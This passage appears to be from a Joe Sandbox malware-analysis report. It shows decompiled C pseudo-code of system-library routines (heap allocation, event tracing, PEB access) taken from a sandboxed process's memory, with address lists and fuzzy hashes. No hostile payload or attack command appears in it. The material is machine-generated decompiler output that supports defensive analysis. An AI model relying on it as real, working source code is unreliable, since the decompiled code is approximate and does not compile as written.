						__eflags =  *((char*)(_t82 + 0xe4));
						if( *((char*)(_t82 + 0xe4)) == 0) {
							 *((char*)(_t82 + 0xe4)) = 1;
							_push(_t82);
							_push( *((intOrPtr*)(_t82 + 0x24)));
							E0128AFD0();
						}
						while(1) {
							_t60 = _t82 + 8;
							 *(_t85 - 0x2c) = _t60;
							_t68 =  *_t60;
							_t80 = _t60[1];
							 *(_t85 - 0x28) = _t68;
							 *(_t85 - 0x24) = _t80;
							while(1) {
								L10:
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t84 = _t68;
								 *(_t85 - 0x30) = _t80;
								 *(_t85 - 0x24) = _t80 - 1;
								asm("lock cmpxchg8b [edi]");
								_t68 = _t84;
								 *(_t85 - 0x28) = _t68;
								 *(_t85 - 0x24) = _t80;
								__eflags = _t68 - _t84;
								_t82 =  *((intOrPtr*)(_t85 + 8));
								if(_t68 != _t84) {
									continue;
								}
								__eflags = _t80 -  *(_t85 - 0x30);
								if(_t80 !=  *(_t85 - 0x30)) {
									continue;
								}
								__eflags = _t80;
								if(_t80 == 0) {
									break;
								}
								_t63 = 0;
								 *(_t85 - 0x34) = 0;
								_t84 = 0;
								__eflags = 0;
								while(1) {
									 *(_t85 - 0x3c) = _t84;
									__eflags = _t84 - 3;
									if(_t84 >= 3) {
										break;
									}
									__eflags = _t63;
									if(_t63 != 0) {
										L40:
										_t84 =  *_t63;
										__eflags = _t84;
										if(_t84 != 0) {
											_t84 =  *(_t84 + 4);
											__eflags = _t84;
											if(_t84 != 0) {
												 *0x133b1e0(_t63, _t82);
												 *_t84();
											}
										}
										do {
											_t60 = _t82 + 8;
											 *(_t85 - 0x2c) = _t60;
											_t68 =  *_t60;
											_t80 = _t60[1];
											 *(_t85 - 0x28) = _t68;
											 *(_t85 - 0x24) = _t80;
											goto L10;
										} while (_t63 == 0);
										goto L40;
									}
									_t69 = 0;
									__eflags = 0;
									while(1) {
										 *(_t85 - 0x38) = _t69;
										__eflags = _t69 -  *0x13384c0;
										if(_t69 >=  *0x13384c0) {
											break;
										}
										__eflags = _t63;
										if(_t63 != 0) {
											break;
										}
										_t66 = E01319063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
										__eflags = _t66;
										if(_t66 == 0) {
											_t63 = 0;
											__eflags = 0;
										} else {
											_t63 = _t66 + 0xfffffff4;
										}
										 *(_t85 - 0x34) = _t63;
										_t69 = _t69 + 1;
									}
									_t84 = _t84 + 1;
								}
								__eflags = _t63;
							}
							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
							 *((char*)(_t82 + 0xe5)) = 1;
							 *((char*)(_t85 - 0x1d)) = 1;
							L12:
							 *(_t85 - 4) = 0xfffffffe;
							E0124922A(_t82);
							_t53 = E01267D50();
							__eflags = _t53;
							if(_t53 != 0) {
								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
							} else {
								_t56 = 0x7ffe0386;
							}
							__eflags =  *_t56;
							if( *_t56 != 0) {
								_t56 = E01318B58(_t82);
							}
							__eflags =  *((char*)(_t85 - 0x1d));
							if( *((char*)(_t85 - 0x1d)) != 0) {
								__eflags = _t82 -  *0x13386c0; // 0xca07b0
								if(__eflags != 0) {
									__eflags = _t82 -  *0x13386b8; // 0x0
									if(__eflags == 0) {
										_t79 = 0x13386bc;
										_t72 = 0x13386b8;
										goto L18;
									}
									__eflags = _t56 | 0xffffffff;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										E01249240(_t68, _t82, _t82, _t84, __eflags);
									}
								} else {
									_t79 = 0x13386c4;
									_t72 = 0x13386c0;
									L18:
									E01279B82(_t68, _t72, _t79, _t82, _t84, __eflags);
								}
							}
							goto L5;
						}
					}
				}
			}

0x01249100
0x01249100
0x01249100
0x01249100
0x01249102
0x01249107
0x0124910c
0x01249110
0x01249115
0x01249136
0x01249143
0x012a37e4
0x012a37e4
0x01249149
0x0124914e
0x0124914e
0x01249117
0x0124911d
0x00000000
0x00000000
0x0124911f
0x01249125
0x00000000
0x01249151
0x01249158
0x0124915d
0x01249161
0x01249168
0x012a3715
0x00000000
0x0124916e
0x0124916e
0x01249175
0x01249177
0x0124917e
0x0124917f
0x01249182
0x01249182
0x01249187
0x01249187
0x0124918a
0x0124918d
0x0124918f
0x01249192
0x01249195
0x01249198
0x01249198
0x01249198
0x0124919a
0x00000000
0x00000000
0x012a371f
0x012a3721
0x012a3727
0x012a372f
0x012a3733
0x012a3735
0x012a3738
0x012a373b
0x012a373d
0x012a3740
0x00000000
0x00000000
0x012a3746
0x012a3749
0x00000000
0x00000000
0x012a374f
0x012a3751
0x00000000
0x00000000
0x012a3757
0x012a3759
0x012a375c
0x012a375c
0x012a375e
0x012a375e
0x012a3761
0x012a3764
0x00000000
0x00000000
0x012a3766
0x012a3768
0x012a37a3
0x012a37a3
0x012a37a5
0x012a37a7
0x012a37ad
0x012a37b0
0x012a37b2
0x012a37bc
0x012a37c2
0x012a37c2
0x012a37b2
0x01249187
0x01249187
0x0124918a
0x0124918d
0x0124918f
0x01249192
0x01249195
0x00000000
0x01249195
0x00000000
0x01249187
0x012a376a
0x012a376a
0x012a376c
0x012a376c
0x012a376f
0x012a3775
0x00000000
0x00000000
0x012a3777
0x012a3779
0x00000000
0x00000000
0x012a3782
0x012a3787
0x012a3789
0x012a3790
0x012a3790
0x012a378b
0x012a378b
0x012a378b
0x012a3792
0x012a3795
0x012a3795
0x012a3798
0x012a3798
0x012a379b
0x012a379b
0x012491a3
0x012491a9
0x012491b0
0x012491b4
0x012491b4
0x012491bb
0x012491c0
0x012491c5
0x012491c7
0x012a37da
0x012491cd
0x012491cd
0x012491cd
0x012491d2
0x012491d5
0x01249239
0x01249239
0x012491d7
0x012491db
0x012491e1
0x012491e7
0x012491fd
0x01249203
0x0124921e
0x01249223
0x00000000
0x01249223
0x01249205
0x01249208
0x0124920c
0x01249214
0x01249214
0x012491e9
0x012491e9
0x012491ee
0x012491f3
0x012491f3
0x012491f3
0x012491e7
0x00000000
0x012491db
0x01249187
0x01249168

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 397482e3708fcda0179553547939dc7d0523d368523a84c898fea2fa40ea6a2c
Instruction ID: b6df7e1ad16849146e72afd646b0a6a8f534123902c3c407a6c02302d193156c
Opcode Fuzzy Hash: 397482e3708fcda0179553547939dc7d0523d368523a84c898fea2fa40ea6a2c
Instruction Fuzzy Hash: 5531D675A21246DFEF2ADB6CC448BAEBBB1BB4C328F14818DD60867241C370A9C0CB51

Uniqueness

Uniqueness Score: -1.00%

Function 01271DB5 Relevance: .1, Instructions: 87
COMMON

Download Yara Rule

C-Code - Quality: 60%

			E01271DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* _t22;
				char _t23;
				void* _t36;
				intOrPtr _t42;
				intOrPtr _t43;

				_v12 = __ecx;
				_t43 = 0;
				_v20 = __edx;
				_t42 =  *__edx;
				 *__edx = 0;
				_v16 = _t42;
				_push( &_v8);
				_push(0);
				_push(0);
				_push(6);
				_push(0);
				_push(__ecx);
				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
				_push(_t36);
				_t22 = E0126F460();
				if(_t22 < 0) {
					if(_t22 == 0xc0000023) {
						goto L1;
					}
					L3:
					return _t43;
				}
				L1:
				_t23 = _v8;
				if(_t23 != 0) {
					_t38 = _a4;
					if(_t23 >  *_a4) {
						_t42 = L01264620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
						if(_t42 == 0) {
							goto L3;
						}
						_t23 = _v8;
					}
					_push( &_v8);
					_push(_t23);
					_push(_t42);
					_push(6);
					_push(_t43);
					_push(_v12);
					_push(_t36);
					if(E0126F460() < 0) {
						if(_t42 != 0 && _t42 != _v16) {
							L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
						}
						goto L3;
					}
					 *_v20 = _t42;
					 *_a4 = _v8;
				}
				_t43 = 1;
				goto L3;
			}

0x01271dc2
0x01271dc5
0x01271dc7
0x01271dcc
0x01271dce
0x01271dd6
0x01271ddf
0x01271de0
0x01271de1
0x01271de5
0x01271de8
0x01271def
0x01271df0
0x01271df6
0x01271df7
0x01271dfe
0x01271e1a
0x00000000
0x00000000
0x01271e0b
0x01271e12
0x01271e12
0x01271e00
0x01271e00
0x01271e05
0x01271e1e
0x01271e23
0x012b570f
0x012b5713
0x00000000
0x00000000
0x012b5719
0x012b5719
0x01271e2c
0x01271e2d
0x01271e2e
0x01271e2f
0x01271e31
0x01271e32
0x01271e35
0x01271e3d
0x012b5723
0x012b573d
0x012b573d
0x00000000
0x012b5723
0x01271e49
0x01271e4e
0x01271e4e
0x01271e09
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction ID: d7f00ec2379221f134214b55e80ed6a85c09b87b4f7de47eae9664af810945f6
Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
Instruction Fuzzy Hash: 9321C432620119FFD725CF59CC80EABBBBDEF85680F214455EA019B250D634AE51C7A0

Uniqueness

Uniqueness Score: -1.00%

Function 012C6C0A Relevance: .1, Instructions: 79
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E012C6C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
				signed short* _v8;
				signed char _v12;
				void* _t22;
				signed char* _t23;
				intOrPtr _t24;
				signed short* _t44;
				void* _t47;
				signed char* _t56;
				signed char* _t58;

				_t48 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t44 = __ecx;
				_v12 = __edx;
				_v8 = __ecx;
				_t22 = E01267D50();
				_t58 = 0x7ffe0384;
				if(_t22 == 0) {
					_t23 = 0x7ffe0384;
				} else {
					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				}
				if( *_t23 != 0) {
					_t24 =  *0x1337b9c; // 0x0
					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
					_t23 = L01264620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
					_t56 = _t23;
					if(_t56 != 0) {
						_t56[0x24] = _a4;
						_t56[0x28] = _a8;
						_t56[6] = 0x1420;
						_t56[0x20] = _v12;
						_t14 =  &(_t56[0x2c]); // 0x2c
						E0128F3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
						if(E01267D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						}
						_push(_t56);
						_push(_t47 - 0x20);
						_push(0x402);
						_push( *_t58 & 0x000000ff);
						E01289AE0();
						_t23 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
					}
				}
				return _t23;
			}

0x012c6c0a
0x012c6c0f
0x012c6c10
0x012c6c13
0x012c6c15
0x012c6c19
0x012c6c1c
0x012c6c21
0x012c6c28
0x012c6c3a
0x012c6c2a
0x012c6c33
0x012c6c33
0x012c6c3f
0x012c6c48
0x012c6c4d
0x012c6c60
0x012c6c65
0x012c6c69
0x012c6c73
0x012c6c79
0x012c6c7f
0x012c6c86
0x012c6c90
0x012c6c94
0x012c6ca6
0x012c6cb2
0x012c6cbd
0x012c6cbd
0x012c6cc3
0x012c6cc7
0x012c6ccb
0x012c6cd0
0x012c6cd1
0x012c6ce2
0x012c6ce2
0x012c6c69
0x012c6ced

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d919fd86143b8b5560aa8a926b2a9e26c99902f900e433e601767ebefe08ffd0
Instruction ID: dce719ccf2549f1f547625fa4c606952ba103901dedcc3617787d27f20708f99
Opcode Fuzzy Hash: d919fd86143b8b5560aa8a926b2a9e26c99902f900e433e601767ebefe08ffd0
Instruction Fuzzy Hash: 1321ABB1A20645AFD715DB68D884E6AB7B8FF48744F040169FA08C7790D634EE50CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 012890AF Relevance: .1, Instructions: 76
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E012890AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
				intOrPtr* _v0;
				void* _v8;
				signed int _v12;
				intOrPtr _v16;
				char _v36;
				void* _t38;
				intOrPtr _t41;
				void* _t44;
				signed int _t45;
				intOrPtr* _t49;
				signed int _t57;
				signed int _t58;
				intOrPtr* _t59;
				void* _t62;
				void* _t63;
				void* _t65;
				void* _t66;
				signed int _t69;
				intOrPtr* _t70;
				void* _t71;
				intOrPtr* _t72;
				intOrPtr* _t73;
				char _t74;

				_t65 = __edx;
				_t57 = _a4;
				_t32 = __ecx;
				_v8 = __edx;
				_t3 = _t32 + 0x14c; // 0x14c
				_t70 = _t3;
				_v16 = __ecx;
				_t72 =  *_t70;
				while(_t72 != _t70) {
					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
						L24:
						_t72 =  *_t72;
						continue;
					}
					_t30 = _t72 + 0x10; // 0x10
					if(E0129D4F0(_t30, _t65, _t57) == _t57) {
						return 0xb7;
					}
					_t65 = _v8;
					goto L24;
				}
				_t61 = _t57;
				_push( &_v12);
				_t66 = 0x10;
				if(E0127E5E0(_t57, _t66) < 0) {
					return 0x216;
				}
				_t73 = L01264620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
				if(_t73 == 0) {
					_t38 = 0xe;
					return _t38;
				}
				_t9 = _t73 + 0x10; // 0x10
				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
				E0128F3E0(_t9, _v8, _t57);
				_t41 =  *_t70;
				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
					_t62 = 3;
					asm("int 0x29");
					_push(_t62);
					_push(_t57);
					_push(_t73);
					_push(_t70);
					_t71 = _t62;
					_t74 = 0;
					_v36 = 0;
					_t63 = E0127A2F0(_t62, _t71, 1, 6,  &_v36);
					if(_t63 == 0) {
						L20:
						_t44 = 0x57;
						return _t44;
					}
					_t45 = _v12;
					_t58 = 0x1c;
					if(_t45 < _t58) {
						goto L20;
					}
					_t69 = _t45 / _t58;
					if(_t69 == 0) {
						L19:
						return 0xe8;
					}
					_t59 = _v0;
					do {
						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
							goto L18;
						}
						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
						 *_t59 = _t49;
						if( *_t49 != 0x53445352) {
							goto L18;
						}
						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
						return 0;
						L18:
						_t63 = _t63 + 0x1c;
						_t74 = _t74 + 1;
					} while (_t74 < _t69);
					goto L19;
				}
				 *_t73 = _t41;
				 *((intOrPtr*)(_t73 + 4)) = _t70;
				 *((intOrPtr*)(_t41 + 4)) = _t73;
				 *_t70 = _t73;
				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
				return 0;
			}

0x012890af
0x012890b8
0x012890bb
0x012890bf
0x012890c2
0x012890c2
0x012890c8
0x012890cb
0x012890cd
0x012c14d7
0x012c14eb
0x012c14eb
0x00000000
0x012c14eb
0x012c14db
0x012c14e6
0x00000000
0x012c14f2
0x012c14e8
0x00000000
0x012c14e8
0x012890d8
0x012890da
0x012890dd
0x012890e5
0x00000000
0x01289139
0x012890fa
0x012890fe
0x01289142
0x00000000
0x01289142
0x01289104
0x01289107
0x0128910b
0x01289110
0x01289118
0x01289147
0x01289148
0x0128914f
0x01289150
0x01289151
0x01289152
0x01289156
0x0128915d
0x01289160
0x01289168
0x0128916c
0x012891bc
0x012891be
0x00000000
0x012891be
0x0128916e
0x01289173
0x01289176
0x00000000
0x00000000
0x0128917c
0x01289180
0x012891b5
0x00000000
0x012891b5
0x01289182
0x01289185
0x01289189
0x00000000
0x00000000
0x0128918e
0x01289190
0x01289198
0x00000000
0x00000000
0x012891a0
0x00000000
0x012891ad
0x012891ad
0x012891b0
0x012891b1
0x00000000
0x01289185
0x0128911a
0x0128911c
0x0128911f
0x01289125
0x01289127
0x00000000

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction ID: 75cab52de58b7162ed43ef678264d1bb5d4ddd59b3232d417beb1d7428cda6ec
Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
Instruction Fuzzy Hash: A521B371A11205EFDF21EF58C445A6AFBF8EB54714F14846EEA4597241D370ED40CB50

Uniqueness

Uniqueness Score: -1.00%

Function 01273B7A Relevance: .1, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E01273B7A(void* __ecx) {
				signed int _v8;
				char _v12;
				intOrPtr _v20;
				intOrPtr _t17;
				intOrPtr _t26;
				void* _t35;
				void* _t38;
				void* _t41;
				intOrPtr _t44;

				_t17 =  *0x13384c4; // 0x0
				_v12 = 1;
				_v8 =  *0x13384c0 * 0x4c;
				_t41 = __ecx;
				_t35 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x13384c0 * 0x4c);
				if(_t35 == 0) {
					_t44 = 0xc0000017;
				} else {
					_push( &_v8);
					_push(_v8);
					_push(_t35);
					_push(4);
					_push( &_v12);
					_push(0x6b);
					_t44 = E0128AA90();
					_v20 = _t44;
					if(_t44 >= 0) {
						E0128FA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x13384c0 * 0xc);
						_t38 = _t35;
						if(_t35 < _v8 + _t35) {
							do {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
							} while (_t38 < _v8 + _t35);
							_t44 = _v20;
						}
					}
					_t26 =  *0x13384c4; // 0x0
					L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
				}
				return _t44;
			}

0x01273b89
0x01273b96
0x01273ba1
0x01273bab
0x01273bb5
0x01273bb9
0x012b6298
0x01273bbf
0x01273bc2
0x01273bc3
0x01273bc9
0x01273bca
0x01273bcc
0x01273bcd
0x01273bd4
0x01273bd6
0x01273bdb
0x01273bea
0x01273bf7
0x01273bfb
0x01273bff
0x01273c09
0x01273c0a
0x01273c0b
0x01273c0f
0x01273c14
0x01273c18
0x01273c18
0x01273bfb
0x01273c1b
0x01273c30
0x01273c30
0x01273c3d

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 427a222095c3b7beea9057f87b7358a8dbc0c8409d7a34711327e9d37d99a887
Instruction ID: 112ee6851052b876becfedd1f7fda4a19e5de5df171c2146b9962cf70ebf817c
Opcode Fuzzy Hash: 427a222095c3b7beea9057f87b7358a8dbc0c8409d7a34711327e9d37d99a887
Instruction Fuzzy Hash: 6321D1B2A10109AFC710DF58DD81F6ABBBDFB40308F1501A8FA09AB251D371ED01DB94

Uniqueness

Uniqueness Score: -1.00%

Function 012C6CF0 Relevance: .1, Instructions: 74
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E012C6CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E01267D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E01267D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x1225c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E0127F6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E0127F6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E012C7016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L01262400( &_v52);
								}
								_t21 = L01262400( &_v28);
							}
						}
					}
				}
				return _t21;
			}

0x012c6cfb
0x012c6d00
0x012c6d02
0x012c6d06
0x012c6d0a
0x012c6d0e
0x012c6d19
0x012c6d2b
0x012c6d1b
0x012c6d24
0x012c6d24
0x012c6d33
0x012c6d39
0x012c6d46
0x012c6d4f
0x012c6d61
0x012c6d51
0x012c6d5a
0x012c6d5a
0x012c6d69
0x012c6d6b
0x012c6d6d
0x012c6d6f
0x012c6d6f
0x012c6d74
0x012c6d79
0x012c6d7a
0x012c6d7f
0x012c6d82
0x012c6d88
0x012c6d89
0x012c6d90
0x012c6d94
0x012c6da7
0x012c6db1
0x012c6db1
0x012c6dbb
0x012c6dbb
0x012c6d90
0x012c6d69
0x012c6d46
0x012c6dc6

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 101b553afe18d779977558ec16d57ca43665d036be6f916ae19e938a3af89b60
Instruction ID: e040441149246cac4b2311cbb064509adeafc5ee14be5b5479805183a78ade77
Opcode Fuzzy Hash: 101b553afe18d779977558ec16d57ca43665d036be6f916ae19e938a3af89b60
Instruction Fuzzy Hash: 2321F8725247469FD311DF28C944B67BBECEF91A44F040A5AFB40C7351E734C588C6A2

Uniqueness

Uniqueness Score: -1.00%

Function 0131070D Relevance: .1, Instructions: 72
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0131070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E013107DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E0130AFDE( &_v8,  &_v12);
					E01311293(_t38, _v28, _t60);
					if(E01267D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E013014FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}

0x0131071b
0x01310724
0x01310734
0x01310738
0x0131074b
0x0131074b
0x01310753
0x01310753
0x01310759
0x0131075d
0x01310774
0x01310779
0x0131077d
0x01310789
0x01310795
0x013107a7
0x01310797
0x013107a0
0x013107a0
0x013107af
0x013107c4
0x013107cd
0x013107cd
0x013107af
0x013107dc

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.420581212.000000000133F000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_1220000_CV.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction ID: ef7f8cd5de5675e0207904ed9e05a0ba9e956ee755682f52b9f30497b50ec3a7
Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
Instruction Fuzzy Hash: DD21F2362042049FD709DF2CCC90AAABBA5EBD4354F048569F9959B385D730D949CB91

Uniqueness

Uniqueness Score: -1.00%

Function 012C7794 Relevance: .1, Instructions: 70
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E012C7794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x1337b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E0128F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E01267D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E01289AE0();
					_t24 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}

0x012c7799
0x012c779a
0x012c779b
0x012c77a3
0x012c77ab
0x012c77ae
0x012c77b1
0x012c77b1
0x012c77bf
0x012c77c4
0x012c77c8
0x012c77ce
0x012c77d4
0x012c77e0
0x012c77e0
0x012c77d6
0x012c77d6
0x012c77de
0x00000000
0x00000000
0x012c77de
0x012c77e5
0x012c77f0
0x012c77f3
0x012c77f6
0x012c77fd
0x012c7800
0x012c780c
0x012c7818
0x012c782b
0x012c781a
0x012c7823
0x012c7823
0x012c7830
0x012c7831
0x012c7838
0x012c783d
0x012c783e
0x012c784f
0x012c784f
0x012c785a

Memory Dump Source

Source File: 00000008.00000002.418379413.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Associated: 00000008.00000002.420558775.000000000133B000.00000040.00000800.00020000.00000000.sdmpDownload File
